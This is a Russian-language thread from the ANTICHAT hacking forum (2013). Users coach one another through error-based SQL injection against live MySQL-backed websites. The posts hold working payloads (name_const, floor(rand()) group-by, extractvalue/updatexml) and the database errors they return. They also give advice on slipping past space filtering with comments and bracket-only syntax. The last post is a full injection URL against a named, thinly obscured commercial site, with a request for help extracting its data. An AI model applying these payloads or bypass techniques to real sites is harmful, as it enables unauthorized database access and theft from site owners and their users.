ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.10.2013, 22:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
отправляю
'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and'
получаю:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S21]: Column already exists: 1060 Duplicate column name '5.5.33-log'
отправляю:
'and(select%201%20from(select%20count(*),concat((s elect%20table_name%20from%20information_schema.tab les%20limit%2010,1),floor(rand(0)*2))x%20from%20in formation_schema.tables%20group%20by%20x)a)and'
получаю:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%201%20from(select%20count(*),concat((select%20ta ble_name%20from%20information_s' at line 3
выше подсказывали с "+" убрал, смог решить проблему. Тут хз что делать...если можно опишите подробно из-за чего возникает такая проблема с запросом!
Спасибо.
|
|
|
|
10.10.2013, 23:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Always, а что, если вместо пробелов использовать комментарии - /**/, или слитные конструкции ?
Как видно на примере, они не декодятся в аски символы и сырые попадают в запрос.
|
|
|
|
11.10.2013, 00:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Ну если там рерайт и параметры берутся из request_uri то "/" у него не получится использовать. В таком случае, остаются беспробельные конструкции.
|
|
|
|
11.10.2013, 00:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
Always, а что, если вместо пробелов использовать комментарии - /**/, или слитные конструкции ?
Как видно на примере, они не декодятся в аски символы и сырые попадают в запрос.
заменилна - /**/
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '*' LIKE url_id' at line 3
|
|
|
|
11.10.2013, 00:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Как я написал выше, в случае рерайта "/" игнорируется, как разделитель между параметрами(впрочем, зависит от самого рерайта конечно). Можешь попробовать беспробельные варианты, скобки как вариант.
|
|
|
|
11.10.2013, 00:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Да, все верно написали.
Сократить текущий запрос до того, чтобы там не было ни одного пробела\спец-символа увы нельзя.
Если там есть функция extractvalue, можно через неё часть данных выводить, если нет:
and(select(1)from(information_schema.tables)group by(concat(,floor(rand(0)*2)))having(min(0))) Кто уберет последний пробел ?
Для вывода чего-то по-очередно нужен лимит.. а там тоже коварный пробел всё портит.
|
|
|
|
11.10.2013, 00:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от wacky
wacky said:
Как я написал выше, в случае рерайта "/" игнорируется, как разделитель между параметрами(впрочем, зависит от самого рерайта конечно). Можешь попробовать беспробельные варианты, скобки как вариант.
где можно почитать?
Спасибо за помощь!
|
|
|
|
11.10.2013, 00:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Версия 5.5, должен быть и extractvalue и updatexml.
|
|
|
|
11.10.2013, 00:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Сообщение от Always
Always said:
где можно почитать?
Спасибо за помощь!
Почитать мануал по функциям и описание уязвимости на mysql.com
Примеры запросов с беспробельным дополнением extractvalue/updatexml
Вместо user() конструируешь подзапрос на вывод нужной информации, а лимитируешь mid/substring на 32 символа.
И да, надеюсь это чисто в образовательных целях, иначе твои действия могут преследоваться по закону.
|
|
|
|
11.10.2013, 12:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Относится ли это к скули?
Warning: Function smartyShowObject() is deprecated in /var/www/сайт/сайт/tools/smarty_v2/compile/%%DE^DEF^DEF53A4D%%search.tpl.php on line 32
in /var/www/сайт/сайт/classes/Tools.php on line 1903
Помогите получить данные
Код:
Code:
http://www.it-kerDELETEch.com.ua/model_list?id=3&mod=1119%27*extractvalue%281,concat_ws%280x27,0x27,%28select%28table_name%29from%28information_schema./*!tables*/%29limit/**/90,1%29%29%29*%27
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
